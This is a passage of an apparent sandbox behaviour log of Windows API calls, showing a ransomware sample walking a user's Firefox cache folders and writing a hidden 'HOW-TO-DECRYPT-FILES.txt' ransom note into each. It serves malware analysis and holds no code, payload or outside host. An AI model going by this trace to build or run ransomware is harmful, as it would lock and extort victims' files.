(hFile=0x184) returned 0x1 [0049.356] WriteFile (in: hFile=0x184, lpBuffer=0x1c99680*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c99680*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.357] GetLastError () returned 0x0 [0049.357] CloseHandle (hObject=0x184) returned 1 [0049.357] GetLastError () returned 0x0 [0049.358] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\64\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.358] GetLastError () returned 0x0 [0049.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\E5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.358] GetLastError () returned 0x0 [0049.358] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.358] SetErrorMode (uMode=0x0) returned 0x1 [0049.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\E5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.359] GetLastError () returned 0x12 [0049.359] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.359] SetErrorMode (uMode=0x0) returned 0x1 [0049.359] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\E5\\9A8D1d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\e5\\9a8d1d01"), fInfoLevelId=0x0, lpFileInformation=0x1c9cc70 | out: lpFileInformation=0x1c9cc70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce309bf0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xce309bf0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xce309bf0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4738)) returned 1 [0049.359] GetLastError () returned 0x12 [0049.359] SetErrorMode (uMode=0x0) returned 0x1 [0049.359] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\E5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\e5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.359] GetLastError () returned 0x0 [0049.360] GetFileType (hFile=0x184) returned 0x1 [0049.360] GetFileType (hFile=0x184) returned 0x1 [0049.360] WriteFile (in: hFile=0x184, lpBuffer=0x1cb8bc4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cb8bc4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.361] GetLastError () returned 0x0 [0049.361] CloseHandle (hObject=0x184) returned 1 [0049.361] GetLastError () returned 0x0 [0049.361] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\E5\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.361] GetLastError () returned 0x0 [0049.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.362] GetLastError () returned 0x0 [0049.362] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.363] SetErrorMode (uMode=0x0) returned 0x1 [0049.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.363] GetLastError () returned 0x12 [0049.363] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.363] SetErrorMode (uMode=0x0) returned 0x1 [0049.363] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\1F\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.364] GetLastError () returned 0x12 [0049.364] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.364] SetErrorMode (uMode=0x0) returned 0x1 [0049.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\1F\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.364] GetLastError () returned 0x12 [0049.364] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.364] SetErrorMode (uMode=0x0) returned 0x1 [0049.364] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\1F\\7ADBDd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\c\\1f\\7adbdd01"), fInfoLevelId=0x0, lpFileInformation=0x1cbdac8 | out: lpFileInformation=0x1cbdac8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4210c30, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4210c30, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4210c30, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x7e9e)) returned 1 [0049.364] GetLastError () returned 0x12 [0049.364] SetErrorMode (uMode=0x0) returned 0x1 [0049.365] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\1F\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\c\\1f\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.365] GetLastError () returned 0x0 [0049.365] GetFileType (hFile=0x184) returned 0x1 [0049.365] GetFileType (hFile=0x184) returned 0x1 [0049.365] WriteFile (in: hFile=0x184, lpBuffer=0x1cd9698*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cd9698*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.367] GetLastError () returned 0x0 [0049.367] CloseHandle (hObject=0x184) returned 1 [0049.368] GetLastError () returned 0x0 [0049.368] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\1F\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.368] GetLastError () returned 0x0 [0049.368] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\F6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.368] GetLastError () returned 0x0 [0049.368] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.368] SetErrorMode (uMode=0x0) returned 0x1 [0049.368] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\F6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.368] GetLastError () returned 0x12 [0049.369] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.369] SetErrorMode (uMode=0x0) returned 0x1 [0049.369] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\F6\\BB00Ed01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\c\\f6\\bb00ed01"), fInfoLevelId=0x0, lpFileInformation=0x1cdcc88 | out: lpFileInformation=0x1cdcc88*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc28c6270, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc28c6270, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc2938690, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xb75e)) returned 1 [0049.369] GetLastError () returned 0x12 [0049.369] SetErrorMode (uMode=0x0) returned 0x1 [0049.369] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\F6\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\c\\f6\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.369] GetLastError () returned 0x0 [0049.369] GetFileType (hFile=0x184) returned 0x1 [0049.369] GetFileType (hFile=0x184) returned 0x1 [0049.369] WriteFile (in: hFile=0x184, lpBuffer=0x1cf8858*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1cf8858*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.373] GetLastError () returned 0x0 [0049.373] CloseHandle (hObject=0x184) returned 1 [0049.373] GetLastError () returned 0x0 [0049.373] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\C\\F6\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.373] GetLastError () returned 0x0 [0049.373] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.374] GetLastError () returned 0x0 [0049.374] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.374] SetErrorMode (uMode=0x0) returned 0x1 [0049.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.374] GetLastError () returned 0x12 [0049.374] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.374] SetErrorMode (uMode=0x0) returned 0x1 [0049.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\07\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.374] GetLastError () returned 0x12 [0049.374] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.374] SetErrorMode (uMode=0x0) returned 0x1 [0049.374] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\07\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.374] GetLastError () returned 0x12 [0049.374] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.375] SetErrorMode (uMode=0x0) returned 0x1 [0049.375] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\07\\1F307d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\07\\1f307d01"), fInfoLevelId=0x0, lpFileInformation=0x1cfda80 | out: lpFileInformation=0x1cfda80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4791f10, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4791f10, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4791f10, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x10c6c)) returned 1 [0049.375] GetLastError () returned 0x12 [0049.375] SetErrorMode (uMode=0x0) returned 0x1 [0049.375] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\07\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\07\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.376] GetLastError () returned 0x0 [0049.376] GetFileType (hFile=0x184) returned 0x1 [0049.376] GetFileType (hFile=0x184) returned 0x1 [0049.376] WriteFile (in: hFile=0x184, lpBuffer=0x1d19650*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1d19650*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.377] GetLastError () returned 0x0 [0049.377] CloseHandle (hObject=0x184) returned 1 [0049.377] GetLastError () returned 0x0 [0049.377] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\07\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.377] GetLastError () returned 0x0 [0049.377] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\08\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.378] GetLastError () returned 0x0 [0049.378] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.378] SetErrorMode (uMode=0x0) returned 0x1 [0049.378] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\08\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.378] GetLastError () returned 0x12 [0049.378] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.378] SetErrorMode (uMode=0x0) returned 0x1 [0049.378] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\08\\71469d01"), fInfoLevelId=0x0, lpFileInformation=0x1d1cc40 | out: lpFileInformation=0x1d1cc40*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x728200b0, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x728200b0, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x728200b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x8266)) returned 1 [0049.379] GetLastError () returned 0x12 [0049.379] SetErrorMode (uMode=0x0) returned 0x1 [0049.379] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\08\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\08\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.379] GetLastError () returned 0x0 [0049.379] GetFileType (hFile=0x184) returned 0x1 [0049.379] GetFileType (hFile=0x184) returned 0x1 [0049.379] WriteFile (in: hFile=0x184, lpBuffer=0x1b3bb08*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b3bb08*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.380] GetLastError () returned 0x0 [0049.380] CloseHandle (hObject=0x184) returned 1 [0049.381] GetLastError () returned 0x0 [0049.381] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\08\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.381] GetLastError () returned 0x0 [0049.381] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\46\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.381] GetLastError () returned 0x0 [0049.382] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.382] SetErrorMode (uMode=0x0) returned 0x1 [0049.382] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\46\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.382] GetLastError () returned 0x12 [0049.382] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.382] SetErrorMode (uMode=0x0) returned 0x1 [0049.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\46\\8E440d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\46\\8e440d01"), fInfoLevelId=0x0, lpFileInformation=0x1b3f0f8 | out: lpFileInformation=0x1b3f0f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4a19670, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4a19670, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4a3f7d0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x517c)) returned 1 [0049.382] GetLastError () returned 0x12 [0049.382] SetErrorMode (uMode=0x0) returned 0x1 [0049.382] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\46\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\46\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.382] GetLastError () returned 0x0 [0049.382] GetFileType (hFile=0x184) returned 0x1 [0049.382] GetFileType (hFile=0x184) returned 0x1 [0049.382] WriteFile (in: hFile=0x184, lpBuffer=0x1b5aec0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b5aec0*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.383] GetLastError () returned 0x0 [0049.383] CloseHandle (hObject=0x184) returned 1 [0049.384] GetLastError () returned 0x0 [0049.384] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\46\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.384] GetLastError () returned 0x0 [0049.384] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\99\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.384] GetLastError () returned 0x0 [0049.384] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.384] SetErrorMode (uMode=0x0) returned 0x1 [0049.384] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\99\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.384] GetLastError () returned 0x12 [0049.384] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.384] SetErrorMode (uMode=0x0) returned 0x1 [0049.384] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\99\\DC667d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\99\\dc667d01"), fInfoLevelId=0x0, lpFileInformation=0x1b5e4b0 | out: lpFileInformation=0x1b5e4b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4b4a170, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4b4a170, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4b4a170, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x5170)) returned 1 [0049.385] GetLastError () returned 0x12 [0049.385] SetErrorMode (uMode=0x0) returned 0x1 [0049.385] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\99\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\99\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.385] GetLastError () returned 0x0 [0049.385] GetFileType (hFile=0x184) returned 0x1 [0049.385] GetFileType (hFile=0x184) returned 0x1 [0049.385] WriteFile (in: hFile=0x184, lpBuffer=0x1b7a278*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b7a278*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.386] GetLastError () returned 0x0 [0049.386] CloseHandle (hObject=0x184) returned 1 [0049.386] GetLastError () returned 0x0 [0049.386] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\99\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.386] GetLastError () returned 0x0 [0049.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\FE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.387] GetLastError () returned 0x0 [0049.387] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.387] SetErrorMode (uMode=0x0) returned 0x1 [0049.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\FE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.387] GetLastError () returned 0x12 [0049.387] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.387] SetErrorMode (uMode=0x0) returned 0x1 [0049.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\FE\\A0C36d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\fe\\a0c36d01"), fInfoLevelId=0x0, lpFileInformation=0x1b7d868 | out: lpFileInformation=0x1b7d868*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce309bf0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xce309bf0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xce309bf0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x6feb)) returned 1 [0049.387] GetLastError () returned 0x12 [0049.387] SetErrorMode (uMode=0x0) returned 0x1 [0049.387] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\FE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\d\\fe\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.388] GetLastError () returned 0x0 [0049.388] GetFileType (hFile=0x184) returned 0x1 [0049.388] GetFileType (hFile=0x184) returned 0x1 [0049.388] WriteFile (in: hFile=0x184, lpBuffer=0x1b99630*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b99630*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.389] GetLastError () returned 0x0 [0049.389] CloseHandle (hObject=0x184) returned 1 [0049.389] GetLastError () returned 0x0 [0049.389] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\D\\FE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.389] GetLastError () returned 0x0 [0049.389] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.390] GetLastError () returned 0x0 [0049.390] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.390] SetErrorMode (uMode=0x0) returned 0x1 [0049.390] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.390] GetLastError () returned 0x12 [0049.390] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.390] SetErrorMode (uMode=0x0) returned 0x1 [0049.390] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\69\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.391] GetLastError () returned 0x12 [0049.391] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.391] SetErrorMode (uMode=0x0) returned 0x1 [0049.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\E\\69\\*", 